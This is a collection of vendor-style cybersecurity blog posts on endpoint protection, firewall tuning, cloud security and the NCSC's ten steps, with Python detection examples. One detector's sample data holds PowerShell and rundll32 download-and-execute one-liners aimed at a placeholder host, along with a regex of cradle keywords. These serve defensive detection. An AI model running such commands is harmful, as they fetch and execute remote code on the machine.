How to deploy next-gen endpoint protection: 10 key features


Learn 10 endpoint protection features you should have in place to secure your business.

Anti-virus protection has been a staple of cybersecurity ever since the virus outbreaks of the late 1980s and 1990s.

AV protection alone is no longer good enough. Most vendors claim to be effective against around 99% of attacks, which means that sooner or later the remaining 1% will get through. That 1% uses advanced techniques to evade signature-based defences, such as abusing legitimate processes already on the machine (so-called living off the land) or fileless malware injected straight into memory when a user visits a compromised website.

 

Endpoint protection is no longer a case of deploy and forget, given the constantly changing nature of attacks. Modern endpoint protection needs to eliminate blind spots and block unknown threats as well as stop known malware.

 

Given that nearly all attacks involve endpoint compromise at some stage, getting this component of the security solution right goes a long way towards making your security posture as strong as it can be.

 

A good endpoint protection solution should be agile and include automation so that both known and unknown threats are blocked. Some of the important features that need to be in place are outlined below.

 

  1. Next Generation AV capability – endpoint protection systems need enhanced AV capability that can detect new attacks in real time; it therefore needs to look at behaviour and not just signatures of known attacks
  2. Use multiple malware detection techniques – effective protection against malware needs multiple detection and protection techniques. These could include AV-type signatures, fileless malware detection, sandboxing, machine learning, cloud lookup, vulnerable software classification and more. The more techniques the better, as long as functionality is not compromised
  3. Prevent fileless malware – most malware still arrives in ordinary attachments such as Word, PDF and Excel files, but emerging attacks are fileless, and endpoint protection needs to protect against attempts to hijack legitimate applications and scripting engines already on the machine
  4. Endpoint Detection and Response (EDR) – detection now needs to be more than responding after the attack has occurred. The solution needs to monitor activity on the endpoint, identify the beginnings of an attack from unusual behaviour and respond accordingly. This applies especially to new or unknown attacks appearing for the first time, which signature-based techniques alone will not stop
  5. Cloud intelligence feed – attackers can spin up and tear down infrastructure on public cloud platforms in minutes, so endpoint protection systems need constant feeds of threat updates from intelligence systems and specialist threat hunters
  6. Cloud architecture – a cloud-based architecture allows the use of big data and up-to-date intelligence feeds, and lets the user base scale up seamlessly across fixed and remote locations as well as mobile clients
  7. Share intelligence across systems – once malware is detected by the endpoint security system, the information should be shared with other systems such as email, web and network security devices to prevent further attempts or infection. The endpoint security should also be able to take feeds from these systems
  8. Protect all endpoint types – all systems accessing data should be comprehensively protected. This must include Windows, macOS, Linux, Android and iOS, especially given that mobile devices now account for a large share of web access (over 50% by some measures)
  9. Dynamic analysis and sandboxing – detection of unknown threats is greatly enhanced by the ability to execute and observe suspicious files in a sandbox environment, with the results fed back to the endpoint protection
  10. Log everything – a logging solution should be in place, with logs from all critical assets sent to it. This provides an invaluable tool for any future analysis, especially when a breach occurs
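A minimal illustration of the behaviour-based detection described in items 1, 3 and 4 above, as an added example that is not code from the original article or from any vendor's product. It runs a few rules over constructed process-creation events in a Sysmon-like shape (the field names, paths and sample command lines are assumptions for the example): an Office application spawning a script host, PowerShell launched with an encoded command (which it decodes), a download cradle inside the decoded payload, and rundll32 being used as a script host. None of these rules depends on a file hash, which is the point of behavioural detection.

```python
"""Behaviour-based detection of fileless / living-off-the-land activity.

Added example for this article, not vendor code. Events use hypothetical
Sysmon-like field names (pid, parent_image, image, command_line).
"""
import base64
import binascii
import re
from pathlib import PureWindowsPath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Strings typical of in-memory download-and-execute ("download cradle") one-liners.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|invoke-expression|\biex\b"
    r"|net\.webclient|frombase64string", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return PureWindowsPath(path).name.lower()


def find_encoded_payload(command_line: str):
    """Return the argument following -EncodedCommand, or None.

    PowerShell accepts any unambiguous prefix of the flag (-e, -ec, -enc ...),
    so match by prefix rather than by a fixed list of spellings.
    """
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] in ("-", "/"):
            flag = tok[1:].lower()
            if flag and "encodedcommand".startswith(flag):
                return tokens[i + 1]
    return None


def decode_payload(payload: str):
    """-EncodedCommand payloads are base64 of UTF-16LE text; None if malformed."""
    try:
        return base64.b64decode(payload, validate=True).decode("utf-16-le")
    except (binascii.Error, ValueError):
        return None


def analyse(event: dict) -> list:
    """Return (rule, detail) findings for one process-creation event."""
    parent = basename(event["parent_image"])
    image = basename(event["image"])
    cmd = event["command_line"]
    findings = []

    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append(("office_spawns_script_host", f"{parent} -> {image}"))

    text = cmd  # what the cradle rule inspects; extended with the decoded payload
    if image in POWERSHELL:
        payload = find_encoded_payload(cmd)
        if payload is not None:
            decoded = decode_payload(payload)
            findings.append(("encoded_powershell", decoded or "<undecodable payload>"))
            if decoded:
                text = f"{cmd} {decoded}"

    m = DOWNLOAD_CRADLE.search(text)
    if m:
        findings.append(("download_cradle", m.group(0)))

    if image == "rundll32.exe" and "javascript:" in cmd.lower():
        findings.append(("rundll32_script_host", cmd))
    return findings


def scan(events) -> dict:
    """Map pid -> findings for every event that triggered at least one rule."""
    results = {}
    for event in events:
        found = analyse(event)
        if found:
            results[event["pid"]] = found
    return results


# Constructed sample events (not real telemetry).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED_CRADLE = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 1, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": PS, "command_line": f"powershell.exe -NoP -W Hidden -enc {ENCODED_CRADLE}"},
    {"pid": 2, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"pid": 3, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";'
                     'GetObject("script:http://example.invalid/x.sct")'},
    {"pid": 4, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": '"WINWORD.EXE" /n report.docx'},
]

if __name__ == "__main__":
    for pid, found in scan(SAMPLE_EVENTS).items():
        for rule, detail in found:
            print(f"pid={pid} {rule}: {detail}")
```

Event 2 is deliberately left unflagged: an admin script run with -ExecutionPolicy Bypass is common on real estates, and a production rule would score it rather than block on it outright. Real EDR products apply hundreds of such rules with scoring and prevalence data; the example shows only the shape of a behavioural rule.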

Surveys have indicated that most security systems have only a small subset of their features activated. Often features are not activated through lack of knowledge or concern that they may affect performance. Sometimes cost is the issue, because some features require additional licensing.

 

Not enabling features needs to be weighed against the impact of a successful breach, where the financial, reputational and confidence costs may well outweigh the cost of doing it properly in the first place.


Be more GDPR compliant: tune up your Next Generation Firewall


Does effective cyber security protection and GDPR compliance mean that existing solutions will need replacing?

That depends on what you have deployed and how you have configured it. The changing nature of the cyber security threat calls for an agile and adaptable protection approach that will increasingly make use of automation and machine learning. In addition, the requirements of GDPR call for an effective cyber security regime that protects personal data and has monitoring and detection systems in place.

 

A comprehensive approach requires multiple layers of protection, not just to address the different types and areas of threat but also to provide an element of redundancy: a threat missed by your endpoint protection may, for example, be detected by your network layer security. Research has indicated that most deployed security products have only around 10% of their features enabled and correctly configured.

 

While some features may simply not be relevant to a particular deployment, the main reasons why many businesses don't switch features on include:

  • Difficulty configuring the features
  • Lack of adequate skill set
  • Concerns it will slow down performance
  • Don’t understand how the features will benefit them 

 

It's worth flipping the conversation on its head and viewing things in terms of the benefits; once those are clear, turning on the required features becomes a no-brainer. We are overwhelmed with statistics about the cost of cyber attacks; one startling figure attributed to the US government is that 75% of small businesses suffer a cyber breach, while the cost of the average cyber attack is over $1m. So there are massive benefits to getting security right, in terms of avoiding reputational damage and, worse still, severe financial costs or potential fines.

 

Going back to the original question: do you need to replace the solutions already deployed? First, look at what you have, how it's configured and how much more you can do with it.

 

A good place to start is your firewall. If you have a well-featured Next Generation Firewall (NGFW) in place, you just need to make sure it is configured for maximum protection. Here are the features you need to enable to get it close to 90% effective; leaving them disabled is like fitting locks to every door and window of your premises and then leaving most of them open.

1. Turn on Intrusion Prevention (IPS)

By default, your NGFW may have intrusion detection (IDS) enabled, but since most people don't understand the alerts even when they monitor them, it's worth automating the protection by enabling IPS. An IPS can block attacks such as worms, viruses, downloadable exploits and malicious attachments. Run new rule sets in detect-only mode for a short period and review what they would have blocked on your own business traffic before switching them to block, so that a noisy signature does not take down a legitimate application.

 2. Enable network-based anti-virus protection

This feature uses deep packet inspection to identify threats in transit. It gives you a second chance to stop threats that endpoint security missed, and it covers devices such as IoT equipment that cannot run anti-virus software but may be especially vulnerable. Bear in mind that content inside TLS connections is invisible to this inspection unless the firewall also performs TLS decryption, which needs its own policy and privacy review.

 3. Enable Malware protection

Malware may not be blocked by other technologies such as IPS or AV, so a good anti-malware engine must be deployed to help in the fight against this principal threat. NGFW malware protection can include indicators of compromise derived from event correlation, site reputation and sandboxing reports.

 4. Use security intelligence feeds

This feature integrates near real-time global intelligence feeds to identify and block known-bad domains, IP addresses and emerging malware sites before they cause damage.

 5. Enable Sandboxing

Sandboxing is a useful tool for identifying and preventing attacks: it runs and analyses executable code in an isolated environment, and the verdict is fed back to the NGFW to block or allow the file. Evasive malware checks for sandbox artefacts and may behave benignly inside one, so treat a clean sandbox verdict as one signal rather than proof.

6. User and Application Control

Compliance regulations mandate auditing that logs who accessed what, and when. An NGFW can be configured to log and control what your users are doing and when they are allowed to do it. It can also manage and minimise the impact of non-business applications such as Netflix during business hours.

7. Web Filtering and Protection

Block individual sites or categories that are either suspect or have no business relevance (adult content, job portals and so on). Suspect sites are also commonly used to push malware onto unsuspecting visitors.

8. Segmentation of the network

Segment your internal networks into logical groups and protect each segment via its own interface or zone on your NGFW, with explicit rules for the traffic allowed between zones. That way you limit lateral movement if malware gets in.

9. Log everything

A logging solution should be in place, with logs from all critical assets sent to it. This provides an invaluable tool for any future analysis, especially when a breach occurs.

 

 

If you are not using the above capabilities you are leaving yourself exposed to threats that could otherwise have been mitigated. Make sure your security team is familiar with NGFW capabilities and takes full advantage of the available features so that your network is protected against the full spectrum of threats. Get more bang for your NGFW buck.

Free eBook: A View of the Cybercrime Threat Landscape

 

$2,235,018 per year

The average amount SMBs spent in the aftermath of a
cyber attack or data breach due to damage or theft of IT
assets and disruption to normal operations.

The amount is staggering, and enough to jeopardize the viability of
many companies. Yet the business benefits that come with the internet,
Cloud computing and other applications are impossible to forego
and remain competitive.

That’s why business owners and executives are asking one question:

  • Is our internet safe?

If your service provider can't demonstrate how it is making your
company less likely to become a victim of cybercrime, then it is time
to consider alternatives.

In this eBook, we’ll outline what companies are up against
today, and how Cisco Umbrella can help bring you peace of mind.

Download the eBook here!

5 Key Cyber Security Elements For Your Business

Digitisation has meant the wholesale adoption of cloud services.

We are going to cover 5 key cyber security elements to help your business navigate the changing IT landscape. These elements are;

  1. Automation
  2. Lifecycle Approach
  3. Integrated Systems
  4. Layered Architecture
  5. Insight and Analytics

Digitisation is solving problems, creating opportunities and rewriting the way in which your business engages with your customers. At the forefront of the cloud services revolution are storage and SaaS. These services give you the ability to design, build and deploy new applications, and it is happening right now at unprecedented speed and scale.

Cloud services bring great flexibility to your business, along with a number of other benefits, while at the same time extending the attack surface and hence the opportunities the 'bad guys' have to compromise your users and data. Meanwhile, the sophistication of attacks is increasing as attackers take advantage of the very benefits that attracted you to the cloud.

Attackers have access to stolen credentials, host malware on legitimate cloud platforms such as AWS and Google Cloud, and can obtain valid certificates for illegitimate purposes, so their infrastructure appears credible.

Your business needs a robust and advanced security architecture built on the back of an executive-sponsored cybersecurity policy to combat the threats. The security architecture needs to be an extension and enhancement of your existing security posture enabling seamless support of your users, data and applications anywhere they choose to work from.  

Surveying the systems that may already be deployed for cybersecurity protection, we are likely to see the following components:

 

  • Perimeter Firewall – protecting your inside hosts from external threats/connections by using network address translation and stateful packet inspection 
  • Anti-Virus Protection – endpoint protection against known virus signatures 
  • Anti-Malware Protection – endpoint protection against known malware types 
  • Email Protection – scanning of email content to protect against malware attachments, phishing and spam  

 

As the IT systems and services landscape changes, your protection systems need to be constantly reviewed and changed where necessary to stay relevant. The approach of IS teams is evolving to meet the emerging threats of the digitisation/cloud era, in which technology is just one tool of the cybersecurity policy.

Your evolving approach should be about taking a holistic view that can adapt ahead of or in line with the threats. Five important elements of this evolving approach are outlined below. 

 

 

  • Automation – potential attacks now need to be stopped in their tracks automatically and cannot wait to be identified and mitigated by human interaction. In the digitisation era, cybersecurity must be able to learn about new threats automatically and decide which ones to block while alerting the monitoring systems

 

  • Lifecycle approach – security solutions must provide a methodology that addresses the 3 phases of a cyber attack, preventing attacks before they happen, detecting and blocking attacks in motion while also collecting details of security events through all phases in order to conduct detailed analysis and learn lessons from attacks 

 

  • Integrated systems – systems need to be integrated in order to share intelligence so that all components in the system of protection can update their configuration to reflect emerging threats and trends 

 

  • Layered Architecture – protection systems need to be based on a layered architecture, following a methodology designed around the business assets, priorities and policies. An architectural approach incorporates multiple interconnected protection mechanisms and technologies to mitigate threats and stop attacks, and provides the same level of protection whether a user is working remotely or on business premises

 

  • Insight and Analytics – systems need to have a complete and comprehensive view of IS environment including who is connected, when and from where they are connected, and what they are doing. The system also needs to include incident and event monitoring to aid in an investigation of incidents and importantly provide the detailed information that may be required to report breaches of sensitive data under compliance regulations such as GDPR 

 

A number of new technologies have emerged that underpin the evolving approach to protection, such as the secure internet gateway and the cloud access security broker. These technologies and their role will be reviewed in our next blog.


10 Ways To Secure Your Business From Cyber Attacks


The cyber security threat landscape is constantly changing, with an ever-growing number and scale of attacks. The measures needed to combat the threats must be robust, comprehensive and agile. Simply put, it is about developing an effective approach and constantly testing and refining it. The sections below cover 10 essential recommended steps for achieving an effective level of cybersecurity, based on guidance from the UK National Cyber Security Centre (NCSC).

Executive Risk Management

Because of the vital role that technology plays in most organisations today, information and its supporting systems need to be properly categorised in the business risk profile. The impact of a compromise of information or systems could be more critical than many other types of business risk and result in reputational and financial damage.

It is important for the risks to be defined and communicated from executive level thus conveying the importance of information and systems.

Further essential steps that the Board should take include:

  • Establish a governance framework
  • Identify risks and approach to risk management
  • Apply standards and best practices
  • Educate users and maintain awareness
  • Constantly review policies

 

Education and Awareness

Training and awareness help to establish a security-conscious culture in the organisation, which could reduce the number of people clicking links in phishing emails or writing passwords on post-it notes. Lack of awareness could result in users connecting compromised personal removable media, falling for phishing attacks, or seeing security as an obstacle and trying to circumvent it. Ignorance of how to handle sensitive information may result in legal and regulatory sanction, as will failure to report certain breaches.

Effective management of the user awareness risk includes the following:

  • Create a user security policy as part of the overall corporate policy
  • Include cyber security in the staff induction – making them aware of their personal responsibilities to comply with the security policy
  • Security risk awareness – maintain awareness of ongoing security risks and guidance
  • Formal training and assessment – staff in security roles should embark on ongoing formal training and certification to keep up to date with the challenges they face
  • Incident reporting culture – enable staff to voice their concerns and report poor security practices

 

Secure Configuration

Systems that are not securely configured are vulnerable to attack. A secure baseline configuration for all systems is essential to reduce the risk of attack and the potential for compromise. Lack of secure configuration and up-to-date patching carries risks such as unauthorised system changes, exploitation of software bugs in unpatched systems and exploitation of insecure default settings.

To avoid poor system configuration, effective security controls need to be put in place, such as:

  • Use supported software
  • Develop and implement policies to update and patch systems
  • Maintain hardware and software inventory
  • Maintain operating systems and software
  • Conduct regular vulnerability scans and act on results in a timely manner
  • Establish configuration and change management
  • Implement application whitelisting so that only positively identified software can execute
  • Limit privileged user accounts and user’s ability to change configurations

 

Network Security

Network connections expose your systems to attack. A set of policies, an architectural strategy and technical controls will help reduce the chances of a successful attack, which could include exploitation of systems, compromise of information in transit, propagation of malware, or damage to or illegal posting on corporate systems.

To manage network security effectively, follow best practice and industry-standard design principles at the very least.

All inbound and outbound traffic should be controlled, monitored and logged. This can be done with an advanced or next generation firewall, intrusion prevention and anti-malware at the perimeter, in addition to endpoint anti-malware.

Internal network protection is often ignored, especially on small networks. It should include the following:

  • Segregate networks into groups based on functions and security roles
  • Secure wireless networks – only authorised, secured devices should be allowed onto corporate networks
  • Secure administration – ensure administrative access is secure and defaults are changed
  • Monitor the network – monitor all traffic with intrusion prevention systems so that indications of attack can be blocked and alerted on immediately
  • Testing and assurance- conduct regular penetration testing and simulate cyber attack exercises to ensure controls work

 

Managing User Privileges

Controlling user privileges at the correct level is important: users should have what they need to work effectively, and no more. Accounts with unnecessary rights are a major risk, because if they are compromised the impact on your cyber security can be severe. Users could accidentally or deliberately misuse their privileges to gain unauthorised access to information.

Attackers could also exploit those privileges to gain administrative access and even disable security controls to widen the scope of their attack.

Some sensible steps to manage these risks include:

  • Effective account management – manage the lifecycle of accounts from start to finish when staff leave, including temporary accounts
  • User authentication and access control – issue and enforce an effective password policy and use two-factor authentication for sensitive systems
  • Limit privileges – give users the minimum rights that they need
  • Limit the use of privilege accounts – limit the access to privileged rights and ensure administrators use normal accounts for standard business use
  • Monitoring and logging – monitor user activity and log all events to an audit and accounting system for future analysis
  • Education – educate users of their responsibilities to adhere to corporate security policies

Incident Management

A security incident is inevitable for every organisation. An effective system of incident management policies and processes will reduce the impact, enable speedier recovery and improve business resilience. Without one, the risks of an attack include:

  • Greater business impact of an attack through failure to realise the attack early enough and consequent slowness to respond resulting in more significant and ongoing impact
  • Potential for continuous or repeated disruption due to failure to find the root cause
  • Failure to conform with legal and regulatory standards which could result in financial penalties

It is important to manage the risk by taking the following steps:

  • Establish an incident management capability using in-house or specialist external service provider, create a plan and test its effectiveness.
  • Define reporting requirements
  • Define roles and arrange specialist training to ensure the correct skill base
  • Establish and regularly test a data recovery strategy including offsite recovery
  • Collect and analyse post incident evidence for root cause analysis, lessons learned and evidence for crime and/or compliance reporting

Malware Prevention

Malware is the most common form of security compromise, and surveys have found that virtually every organisation's network contacts known malware sites. Malware risks include email with malicious content or links to malicious sites, web browsing to sites containing malicious content, and introduction of malware through uncontrolled devices such as USB media or smartphones.

Inadequate controls for protection against malware could result in business disruption and/or loss of access to critical data.
Malware risks can be managed effectively using the following techniques:

  • Create and implement effective malware policies
  • Control import and export of data and incorporate malware scanning
  • Use blocklists (blacklists) to block access to known malicious sites
  • Establish a defence-in-depth approach that includes security controls for endpoints, anti-virus, content filtering to detect malicious code, disabling of unneeded browser plugins and autorun features, and baseline security configurations
  • Users should be educated regularly to understand the risk of malware, their role in preventing it and the procedure for incident reporting
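The feed matching behind the "block access to known malicious sites" bullet above, and behind "Use security intelligence feeds" and web filtering in the NGFW article earlier on this page, as an added example that is not code from the original article or from any vendor. It checks constructed DNS resolver log lines against a small constructed indicator set (the domains use reserved example/test names, the hosting range is TEST-NET-3, and the log format is an assumption). The detail worth noticing is the matching rule: an indicator for evil.example must also catch cdn.evil.example, but must not catch notevil.example, which a naive string-suffix test would flag.

```python
"""Match DNS query logs against a threat-intelligence feed.

Added example, not vendor code. Log format and indicator values are
constructed for the example (reserved example/test names, TEST-NET-3).
"""
import ipaddress

# A tiny stand-in for a feed of malicious domains and hosting networks.
FEED_DOMAINS = {"evil.example", "malware-cdn.test"}
FEED_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]

# Constructed resolver log lines: timestamp followed by key=value pairs.
LOG_LINES = [
    "2024-05-01T10:00:01Z client=10.1.2.3 qname=cdn.evil.example. qtype=A rdata=198.51.100.7",
    "2024-05-01T10:00:02Z client=10.1.2.4 qname=www.notevil.example qtype=A rdata=192.0.2.10",
    "2024-05-01T10:00:03Z client=10.1.2.5 qname=update.vendor.example qtype=A rdata=203.0.113.44",
    "2024-05-01T10:00:04Z client=10.1.2.3 qname=MALWARE-CDN.TEST qtype=AAAA rdata=2001:db8::1",
]


def normalise(name: str) -> str:
    """Strip the trailing dot of a fully qualified name and lower-case it."""
    return name.rstrip(".").lower()


def match_domain(qname: str):
    """Return the feed entry matching qname or any of its parent domains.

    Matching is done on label boundaries, so evil.example catches
    cdn.evil.example but not notevil.example.
    """
    labels = normalise(qname).split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in FEED_DOMAINS:
            return candidate
    return None


def match_network(address: str):
    """Return the feed network containing the resolved address, if any."""
    try:
        ip = ipaddress.ip_address(address)
    except ValueError:
        return None
    for net in FEED_NETWORKS:
        if ip.version == net.version and ip in net:
            return str(net)
    return None


def parse_line(line: str) -> dict:
    """Split 'ts k=v k=v ...' into a dict; unknown tokens are ignored."""
    timestamp, *fields = line.split()
    record = dict(f.split("=", 1) for f in fields if "=" in f)
    record["ts"] = timestamp
    return record


def scan_log(lines) -> list:
    """Return one hit per log line whose name or answer matches an indicator."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        indicator = (match_domain(rec.get("qname", ""))
                     or match_network(rec.get("rdata", "")))
        if indicator:
            hits.append({"ts": rec["ts"], "client": rec["client"],
                         "qname": normalise(rec["qname"]), "indicator": indicator})
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(f"{hit['ts']} {hit['client']} -> {hit['qname']} matched {hit['indicator']}")
```

In production the feed is large and refreshed continuously, so it is loaded into a set (or a trie for very large lists) and reloaded on a schedule rather than re-read per query. Expect false positives from shared hosting addresses and CDNs in network indicators; an allowlist checked before the feed, and logging of every block, are what make the control tolerable to users.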

Systems Monitoring

Systems monitoring provides the ability to determine how systems are being used and whether they have been attacked or compromised. Poor or absent monitoring prevents an organisation from detecting attacks against its infrastructure or services, slows its reaction to an attack (increasing the severity) and can cause non-compliance with legal or regulatory requirements.
These risks can be reduced by taking the following steps:

  • Develop and implement a monitoring strategy based on the business risk assessment
  • Ensure that all systems are monitored, should include the ability to detect known attacks as well as having heuristic capabilities
  • Monitor network traffic to identify unusual traffic or large uncharacteristic data transfers
  • Monitor user activity for unauthorised use of systems
  • Fine tune monitoring systems to collect relevant events and alerts
  • Deploy a centralised logging solution with collection and analysis capability, and automated anomaly and high priority alerts
  • Align policies and processes to manage and respond to incidents detected by monitoring systems
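The "large uncharacteristic data transfers" bullet above, as an added example that is not code from the original article. It builds a per-host baseline of daily outbound volume from constructed flow summaries (host addresses, day numbers and volumes are all made up for the example) and scores the day under review with a robust z-score based on the median and median absolute deviation, which one earlier spike cannot inflate the way a mean and standard deviation can. It also handles two cases a naive threshold gets wrong: a host with no history, which cannot be baselined and is reported separately, and a host whose baseline has zero variance.

```python
"""Flag uncharacteristically large outbound transfers per host.

Added example, not code from the original article. Flow summaries, hosts
and volumes are constructed; 'day' is a simple day index for the example.
"""
from collections import defaultdict
from statistics import median


def robust_zscore(history, value: float) -> float:
    """(value - median) / scaled MAD, robust to a few outliers in history.

    If every historical day is identical (MAD == 0) fall back to 10% of the
    median (at least 1 unit) so we never divide by zero.
    """
    med = median(history)
    mad = median(abs(x - med) for x in history)
    scale = 1.4826 * mad if mad > 0 else max(0.1 * med, 1.0)
    return (value - med) / scale


def daily_totals(flows) -> dict:
    """host -> {day -> MB sent}, summing multiple flows per host per day."""
    totals = defaultdict(lambda: defaultdict(float))
    for flow in flows:
        totals[flow["src"]][flow["day"]] += flow["mb_out"]
    return totals


def detect_exfiltration(flows, target_day, min_history=5,
                        z_threshold=3.5, floor_mb=50.0) -> list:
    """Return findings for hosts whose outbound volume on target_day is unusual.

    floor_mb stops tiny hosts being reported for statistically large but
    practically irrelevant changes (2 MB -> 6 MB).
    """
    findings = []
    for host, per_day in daily_totals(flows).items():
        today = per_day.get(target_day, 0.0)
        history = [mb for day, mb in per_day.items() if day < target_day]
        if today < floor_mb:
            continue
        if len(history) < min_history:
            findings.append({"host": host, "reason": "no_baseline",
                             "mb_out": today, "z": None})
            continue
        z = robust_zscore(history, today)
        if z > z_threshold:
            findings.append({"host": host, "reason": "anomalous_outbound",
                             "mb_out": today, "z": round(z, 1)})
    return findings


# Constructed sample: seven days of history (days 1-7) and the day under review (day 8).
SAMPLE_FLOWS = []


def _add_host(host, history, today_mb, today_day=8):
    for day, mb in enumerate(history, start=1):
        SAMPLE_FLOWS.append({"day": day, "src": host, "mb_out": mb})
    SAMPLE_FLOWS.append({"day": today_day, "src": host, "mb_out": today_mb})


_add_host("10.1.2.10", [118, 122, 120, 125, 117, 121, 119], 124)   # normal workstation
_add_host("10.1.2.20", [78, 82, 80, 85, 77, 81, 79], 4000)         # ~50x its usual volume
SAMPLE_FLOWS.append({"day": 8, "src": "10.1.2.20", "mb_out": 200})  # second flow, same day
_add_host("10.1.2.30", [], 900)                                    # new host, no history
_add_host("10.1.2.40", [2, 2, 2, 2, 2, 2, 2], 6)                   # zero-variance, tiny host

if __name__ == "__main__":
    for finding in detect_exfiltration(SAMPLE_FLOWS, target_day=8):
        print(finding)
```

The same structure works for other counters from the monitoring list (logons per user, DNS queries per host, failed authentications); what changes is the aggregation key and the floor. Per-host baselines are what make "uncharacteristic" meaningful: a file server moving 4 GB a day is normal, a receptionist's workstation doing so is not.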

Removable Media

Removable media such as USB memory devices are often involved in introduction of malware or removal of sensitive data. A comprehensive cyber security strategy must implement controls such as those listed below to effectively manage the risk posed.

  • Devise and implement a policy to govern the use of removable media, including a standard for how information is exchanged with corporate systems and the protective measures required
  • If essential, the use of removable media should be limited only to designated devices
  • Automatically scan removable media for malware before any data transfer
  • Issue removable media formally to users and prohibit the use of personal USB sticks
  • Encrypt information at rest on removable media
  • Manage reuse and disposal of media to ensure data is effectively deleted or media destroyed and data retrieval prevented

Remote Working

Remote working for staff and remote support from suppliers are effective and popular but can expose organisations to risk. Mobile working necessitates the transfer of data across the Internet, sometimes from public places. The risks include loss or theft of data if mobile devices are stolen, compromise of credentials or data if screens are overlooked in public, loss of user credentials stored on a device, and remote tampering through insertion of malware or monitoring of activity.
Some of the recommended controls are listed below:

  • Create a robust policy to address the risk, this should include identifying who is authorised, what kind of information they can access, increased monitoring for remote connections
  • User training to include; awareness of the risks, securely storing and managing credentials, incident reporting
  • Develop and apply a secure baseline for remote devices
  • Encrypt data at rest and data in transit for remote/mobile devices

 

5 Basics of Cloud Security

The basic objective of a cloud security strategy is to provide a method to monitor and protect the flow of information to and from cloud hosted services. There has been and will continue to be a shift towards public and private cloud services as the age of digitisation is increasingly being embraced by organisations. 

 

According to Cisco's Annual Cyber Security Report, one of the principal reasons organisations decide to host corporate applications in the cloud is increased security.


On the other hand, many small and medium organisations are adopting cloud technology without a clear strategy, resulting in blurred lines of responsibility between the cloud provider and the organisation. In the eyes of the cloud providers the responsibilities and boundaries are clear, as illustrated in the graphic below.

 

Graphic: Security in the cloud is a shared responsibility (cloud security, DNS, IaaS, PaaS, SaaS)

Cyber attackers are increasingly taking advantage of this blurring of the boundaries to exploit systems. It is important to undertake a proper risk assessment before cloud services are adopted. This will enable a clear understanding of the risks and a consequent strategy to mitigate the risks.  

 

The basic approach to cloud security will be based on the risk profile. It essentially needs to address the different phases of a cyber attack, namely before, during and after, and it should be an extension of the organisation's security approach to its on-premise information systems and data, which generally addresses the question of who is allowed access to what information.

 

Some of the key features that need to be addressed by a cloud cyber security approach include:

  • Visibility and Control
  • Securing Cloud Applications
  • Extended Protection
  • Virtualise the Security Architecture
  • Threat intelligence

 

Visibility and Control 

Users will try to use whatever they can to get the job done. Organisations need visibility and control of what applications are being used in the cloud and remotely, especially with the growth of new SaaS applications. Visibility enables an understanding of what is being used in line with policy, what is out of policy and what is a threat. Visibility is the first step to controlling and securing the organisations environment based on what services should be provided. 

 

Securing Cloud applications 

As SaaS applications are increasingly deployed in public clouds such as Amazon Web Services and Azure, it is vital to ensure that the cloud platform is secure. Even though the cloud providers deploy their own security controls, organisations also need to implement independent security systems to secure the user and the data, as this is not the responsibility of the cloud provider. In its recent cyber security report, Cisco identified the misuse of legitimate cloud services to host malware as a major growth area for cyber attacks. The need to secure services in public clouds therefore cannot be overstated.

 

Extended Protection

As remote connectivity and branch networking grow in popularity, the security solution should be able to extend features such as firewalling, threat management and anti-malware to the edge of the network, rather than relying on the current centralised deployment model. This functionality should be provided on endpoints, remote connections and remote offices, and vitally on devices used off site, for example in internet cafes.

 

Virtualise the Security Architecture 

The need for security is now pervasive at the client, the branch, the HQ as well as public and private clouds where SaaS applications are located. This necessitates the capability for a virtualised security architecture where the panoply of security functionality can be deployed easily at any location. This approach also enables the organisation to scale security at speed which will meet business demands for rapid deployment of new services while avoiding security being an afterthought. 

 

Threat intelligence 

Most organisations deploy security components from multiple vendors. An intelligent approach to securing information and systems in the emerging environment must make use of threat intelligence to overcome any cross-vendor incompatibilities. This is the ability to take intelligence feeds from other sources, such as other security vendors' feeds, and make context-based threat assessments relating to your organisation and what it means for you. This assessment can naturally feed into automated protection mechanisms.

 

In the next blogs in this series, we will cover some best-practice approaches to cloud security and discuss some of the technologies being used.

 

Penetration Test: the new cyber test in town


 

When was the last time you had a penetration test of your network or a vulnerability assessment? Penetration testing has traditionally been an annual event for most organisations. Of late we have seen vulnerability assessments delivered as a service with the ability to run tests on demand. Invariably vulnerability assessments are still run once a year oftentimes due to resource shortage and in many instances it’s just not a high priority because nothing bad has happened – or at least we are not aware of it. 

 

On the other hand, industry security statistics indicate that the general approach to security could well be a disaster waiting to happen, or worse still a disaster that has already happened but has not yet been discovered. Yes, we know that enterprise organisations and some medium sized organisations have a rigorous security regime in place and manage security according to best practices. Despite the efforts of those organisations, the numbers are still overwhelmingly in favour of the bad guys, as illustrated below.

 

  • 100% of organisations interact with known malware sites – simply put, everyone is likely to be infected at some stage 
  • 99 days – average time to detect a breach of a pool of known vulnerabilities 
  • 4 hours – average time it takes cyber attackers to steal data 
  • 365 days – time between vulnerability assessments and penetration tests 

 

